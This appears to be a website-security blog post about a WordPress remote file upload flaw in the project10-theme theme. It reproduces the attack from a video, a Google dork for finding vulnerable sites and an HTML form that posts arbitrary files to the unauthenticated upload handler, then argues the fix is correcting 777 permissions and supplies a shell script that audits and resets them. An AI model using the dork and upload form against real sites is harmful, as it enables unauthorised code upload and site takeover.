There is a recent video on youtube.com titled “How to Hack WordPress Sites Using WordPress Remote File Upload Vulnerability”. WebDux.com thinks this hack is easy to avoid on WordPress websites.
How They Hack a WordPress Website Through the Upload Vulnerability
1. Google dork for “inurl:/wp-content/themes/project10-theme/” to find WordPress websites that use the project10-theme theme.
2. Use the following HTML form (the video's, with the duplicated "http://" in the action URL and the missing closing form tag fixed; the handler filename is kept exactly as the video gives it) to post a file containing malicious code to the theme's upload handler. Nothing authenticates the request: whoever submits the form gets their file written into the theme directory.

<form enctype="multipart/form-data" action="http://www.domain.com/wp-content/themes/project10-theme/functions/upload-andler.php" method="post">
  Please choose a file: <input name="orange_themes" type="file" /><br />
  <input type="submit" value="upload" />
</form>
What Really Lets the Upload Vulnerability Work on a WordPress Website
The problem is not with the project10-theme theme's code or with WordPress itself. It is the hosting account's file permissions: the theme directories were set to 777, so any local user and the web server process can write into them, and PHP then executes whatever was written there.

Set the permissions to 775, or better to 755, the usual Linux setting for web directories (the owner can write; group and others can only read and traverse), and the upload in the video no longer lands on disk, so WordPress websites are no longer hacked this way. Two caveats a practitioner should keep in mind: 755 only helps when the PHP process is not running as the owner of the files (on hosts using suPHP or per-user PHP-FPM pools it is, and 755 still lets it write), and the permission change removes the write access the handler relies on rather than the handler's own failure to check what is being uploaded, so a handler that accepts arbitrary file types is still worth fixing or removing.
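As an added example (not code from the original post or from the theme), here is a small POSIX shell script that lists the world-writable entries a 777 setup leaves behind and resets them to 755 for directories and 644 for files. Its demo() function builds a constructed, throwaway directory tree that mirrors the theme path quoted above so it runs offline; the path and handler filename are the ones from the post, everything else is assumed.

```sh
#!/bin/sh
# Added example (not code from the original post): audit a WordPress tree for the
# 777-style, world-writable permissions the post blames, then reset them to 755 for
# directories and 644 for files. Assumes a POSIX shell with find, chmod and mktemp.

# Print every directory or file under $1 that is writable by "other" (mode bit 002).
# Symlinks are skipped because their own mode is meaningless.
find_world_writable() {
    find "$1" ! -type l -perm -002
}

# Number of world-writable entries under $1; 0 means the hosting-level hole is closed.
count_world_writable() {
    find_world_writable "$1" | wc -l | tr -d ' '
}

# Reset permissions: directories need the execute (traverse) bit, plain files do not.
fix_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Self-contained demonstration on a constructed, throwaway tree that mimics the
# layout from the post (the theme path and handler name are taken from it).
# Prints "<before> <after>" counts of world-writable entries: 4 directories plus
# 1 file at 777 before the fix, none after it.
demo() {
    tmp=$(mktemp -d) || return 1
    theme="$tmp/wp-content/themes/project10-theme/functions"
    mkdir -p "$theme"
    printf '<?php // placeholder handler (constructed for the demo)\n' > "$theme/upload-andler.php"
    chmod -R 777 "$tmp/wp-content"          # the misconfiguration the post describes
    before=$(count_world_writable "$tmp/wp-content")
    fix_permissions "$tmp/wp-content"
    after=$(count_world_writable "$tmp/wp-content")
    rm -rf "$tmp"
    echo "$before $after"
}
```

On a real install, run count_world_writable against the document root (for example /var/www/html, an assumed path) before and after fix_permissions; a non-zero count that comes back later means something on the host is re-chmodding files. Remember that a count of 0 only proves the hosting-level hole is closed: if PHP runs as the owner of the files, the handler can still write there, and the handler itself has to reject .php uploads.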
That's all; we hope it is useful for you. You are welcome to share your own website security ideas.